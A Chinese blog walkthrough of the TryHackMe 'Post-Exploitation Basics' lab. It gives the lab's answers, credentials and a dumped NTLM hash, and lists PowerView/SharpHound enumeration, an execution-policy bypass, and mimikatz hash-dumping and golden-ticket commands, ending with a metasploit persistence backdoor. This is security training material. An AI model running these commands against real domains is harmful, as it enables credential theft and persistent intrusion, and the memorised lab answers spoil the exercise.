Tryhackme-Post-Exploitation Basics

最新推荐文章于 2024-05-20 10:01:22 发布
最新推荐文章于 2024-05-20 10:01:22 发布
阅读量543 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36531487/article/details/119890974
版权

Post-Exploitation Basics

文章目录


使用工具:PowerView,Bloodhound,SharpHound,mimikatz,metasploit

Task1 Introduction

Deploy the Machine

Username: Administrator

Password: P@$$W0rd

Domain Name: CONTROLLER

Task2 Enumeration w/ Powerview

1.What is the shared folder that is not set by default?

Share

image-20210804103733870

2.What operating system is running inside of the network besides Windows Server 2019?

Windows 10 Enterprise Evaluation

image-20210804103807027

3.I’ve hidden a flag inside of the users find it

POST{P0W3RV13W_FTW}

image-20210804103831771

PoweView使用 https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1

powershell -ep bypass – 绕过powershell的执行策略,在cmd中运行powershell

. .\PowerView.ps1 – 启动PowerView

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 --查看具体powershell命令

Task3 Enumeration w/ Bloodhound

1.What service is also a domain admin

SQLSERVICE

image-20210804144352523

SharpHound.ps1 – https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1

. .\SharpHound.ps1

Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip

image-20210804142721726

2.What two users are Kerberoastable?

SQLSERVICE,KRBTGT

image-20210804144228399

Task4 Dumping hashes w/ mimikatz

1.what is the Machine1 Password?

password1

image-20210804145333366

2.What is the Machine2 Hash?

c39f2beb3d2ec06a62cb887fb391dee0

image-20210804145456342

Task5 Golden Ticket Attacks w/ mimikatz

1.I understand how a golden ticket attack works and how to use a golden ticket attack to move through a network

mimikatz - 金票攻击

lsadump::lsa /inject /name:用户名 – 导出用户的hash

image-20210804150556885

Kerberos::golden /user:** /domain:** /sid:** /用户名:NTLM /id:** – 创建黄金票据

image-20210804151725710

misc::cmd – 打开一个新的命令行,即可访问域内其他机器

image-20210804152215873

task6 Enumeration w/ Server Manager

1.What tool allows to view the event logs?

Event Viewer

2.What is the SQL Service password

MYpassword123#

Server Manager>Tools>Active Directory Users and Computers>CONTROLLER.local>Users

image-20210804152915666

Task7 Maintaining Access

1.I understand how to install a backdoor on a system using the persistence module

生成载荷

image-20210804164126863

连接服务器

image-20210804164215270

持久化连接

image-20210804164317515

Task8 Conclusion

1.I understand the basics of post-exploitation

zhangwenbo1229
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tryhackme-writeups:我对TryHackMe机器的笔记
03-08
- **Post Exploitation(后渗透)**:进一步操作,如数据盗窃、持久化等。 - **Tools Used(使用工具)**:列举并解释了在攻击过程中用到的各种工具。 - **Lessons Learned(学习心得)**:总结从该机器中学到的...
探索网络边界的隐形之犬:SharpHound
gitblog_00099的博客
05-09 298
探索网络边界的隐形之犬:SharpHound 项目地址:https://gitcode.com/BloodHoundAD/SharpHound网络安全领域,信息的收集和分析是至关重要的。SharpHound就是这样一款强大的开源工具,它专为域环境的安全审计而设计,帮助你挖掘潜在的风险点。项目由BloodHound团队维护,其目标是提供高效且全面的域枚举功能。 项目介绍 SharpHound是一...
枚举活动目录的常见技术
cike_y
06-24 421
在进入AD对象和枚举之前,让我们先了解凭据注入方法。从 活动目录的渗透中,会看到通常可以在不损害加入域的计算机的情况下找到凭据。特定的枚举技术可能需要特定的设置才能工作。
推荐开源项目:SharpHound - BloodHound的C重写版
最新发布
gitblog_00095的博客
05-20 321
推荐开源项目:SharpHound - BloodHound的C#重写版 项目地址:https://gitcode.com/BloodHoundAD/SharpHound3 在这个网络安全日益重要的时代,BloodHound作为一个强大的活动目录攻击路径可视化工具,被广大安全研究者和IT管理员所熟知。而SharpHound作为其C#版本的重写,继承了原项目的优点,并在效率和兼容性上做出了提升。 项...
Forest
weixin_45007073的博客
10-22 314
Forest靶机信息信息收集 靶机信息 信息收集
TryHackMe-进攻性渗透测试-12_枚举活动目录
M1n9K1n9的博客
12-24 418
一旦我们有了第一组 AD 凭据以及在网络上对其进行身份验证的方法,一个充满可能性的全新世界就会打开!我们可以通过经过身份验证的访问(甚至是超低特权访问)开始枚举有关 AD 设置和结构的各种详细信息。在红队参与期间,这通常会导致我们能够执行某种形式的权限提升或横向移动以获得额外的访问权限,直到我们有足够的权限来执行和实现我们的目标。在大多数情况下,枚举和利用严重交织在一起。一旦枚举阶段显示的攻击路径被利用,将再次从这个新的特权位置执行枚举,如下图所示。
域信任关系攻击指南
include_heqile的博客
10-21 1646
距离我上一次发表关于Action Directory 域信任相关的博客已经差不多过去两年了。我发现我之前的文章中有些关于信任关系和组成员的误解。结合去年PowerView做出的改动,最终使我更新了枚举和攻击域信任关系的文章。这将是我最后一篇讲解关于域信任关系攻击的文章,大概有8000字,读起来并不轻松。通常情况下,我不会仅仅写出我的操作笔记----我尽量详细描述,以期我的文章可以作为大家的一份全面...
tryhackme-ctf:TryHackMe CTF的编写,注释,dratfs,拼字游戏,文件和解决方案
05-06
注释,代码,PoC,解决方案,文章,涂鸦,草稿...。 (意大利前10名 :Italy: ) 使用的工具: 挖 ping 跟踪路线 exiftool 哈希猫 开膛手约翰 GTFObins 尼克托 哈希标识符 ... 敲门(端口敲门)
android-kernel-exploitation:Android内核开发
03-19
Android内核开发 客观的 本次研讨会的目的是开始在Android平台上进行内核...git clone https://github.com/cloudfuzz/android-kernel-exploitation ~ /workshop Github页面URL 车间流 作者 阿什法克安萨里( 的) 。
Lyon Yang - Advanced SOHO Router Exploitation.zip
10-25
《Lyon Yang - Advanced SOHO Router Exploitation》是一份深度探讨家庭及小型办公室路由器安全性的资源,由网络安全专家Lyon Yang撰写。这份资料详细介绍了如何识别并利用SOHO(Small Office/Home Office)路由器的...
Lyon Yang - Advanced SOHO Router Exploitation.pdf
08-21
Lyon Yang - Advanced SOHO Router Exploitation.pdf
SharpHound:旧的BloodHound C#摄取器(已弃用)
02-05
现在不 。 使用此方法收集的数据将无法在BLOODHOUND 3.0中使用 SharpHound-BloodHound摄入器的C#重写 获取SharpHound 最新版本的SharpHound始终在的BloodHound存储库中 编译指令 Sharphound是使用C#7.0功能编写的。 若要轻松编译此项目,请使用Visual Studio 2017。 如果要在Visual Studio的早期版本上进行编译,则可以安装 nuget程序包。 构建项目将生成可执行文件以及封装可执行文件的PowerShell脚本。 所有依赖项都将汇总到二进制文件中。 要求 Sharphound是针对.Net
SharpHound3:第3版BloodHound项目的C#数据收集器
05-05
SharpHound-BloodHound摄入器的C#重写 获取SharpHound 最新版本的SharpHound始终位于的BloodHound存储库中 编译指令 SharpHound是使用C#9.0功能编写的。 若要轻松编译此项目,请使用Visual Studio 2019。 如果要在Visual Studio的早期版本上进行编译,则可以安装 nuget程序包。 构建项目将生成可执行文件以及封装可执行文件的PowerShell脚本。 所有依赖项都将汇总到二进制文件中。 要求 SharpHound是针对.Net 4.5设计的。 Sharphound必须从域用户的上下文中运行,或者直接通过登录或通过其他方法(例如RUNAS)运行。 更多信息 用法 枚举选项 CollectionMethod-要使用的收集方法。 此参数接受逗号分隔的值列表。 具有以下潜在值(默认:默认): 默认-执行
post-exploitation:有用的脚本和模块
05-26
后开发 有用的脚本和模块
memset 线程安全_恶意.NET安全攻防(一):使用ETW隐藏你的.NET
weixin_35748962的博客
12-19 260
前言随着目前的防御机制不断加强对于PowerShell的检测功能,攻击者也不断改变他们所使用的战术,并逐渐改用到很少会被监测到的技术,.NET就是其中的一种。随着时间的推移,很多攻击者已经习惯了可以用于后漏洞利用的大量.NET Payload。诸如GhostPack和SharpHound这样的工具套件,已经成为攻击者武器库中的一部分,负责为其提供“动力”的框架,通常会是Cobalt S...
BloodHound官方使用指南
weixin_30449239的博客
04-02 1239
0x00 概观1.BloodHound介绍BloodHound是一种单页的JavaScript的Web应用程序,构建在Linkurious上,用Electron编译,NEO4J数据库是PowerShell/C# ingestor.BloodHound使用可视化图来显示Active Directory环境中隐藏的和相关联的主机内容。攻击者可以使用BloodHound轻松识别高度复杂的攻击路径,否则...
红队知识体系梳理1-域内信息收集
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-09 612
红队知识体系梳理1-域内信息收集
内网:bloodhound域渗透分析工具
y995zq的博客
05-11 676
介绍:利用BloodHound对庞大内网域环境进行自动化信息搜集并整理分析数据,提高渗透效率。BloodHound是一款可视化图形分析域环境中的关系的工具,以用图与线的形式,将域内用户、计算机、组、Sessions、ACLs以及域内所有相关用户、组、计算机、登陆信息、访问控制策略之间的关系更直观的展现在红队人员面前进行更便捷的分析域内情况,更快速的在域内提升自己的权限。它也可以使蓝队成员对己方网络系统进行更好的安全检测及保证域的安全性。
域用户更改密码提示拒绝访问_AD域中的ACL攻防探索
weixin_39562615的博客
11-23 2878
前言关于域内ACL的攻防近两年经常被人所提起,同时也产生了很多关于域内ACL相关的工具和攻击方式,本文将会从ACL的概念谈起,然后介绍几种不同的域内攻击方式以及如何监测和防御对于ACL的攻击。ACL的概念和作用ACM:首先想要了解ACL首先需要了解Access Control Model(访问控制模型),根据官网(https://docs.microsoft.com/zh-cn/wind...
云服务器上搭建beef-xss
03-11
在云服务器上搭建beef-xss(Browser Exploitation Framework)可以用于进行Web浏览器漏洞利用和XSS攻击的测试和研究。下面是一些步骤来搭建beef-xss: 1. 选择云服务器:首先,你需要选择一个云服务器提供商,如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值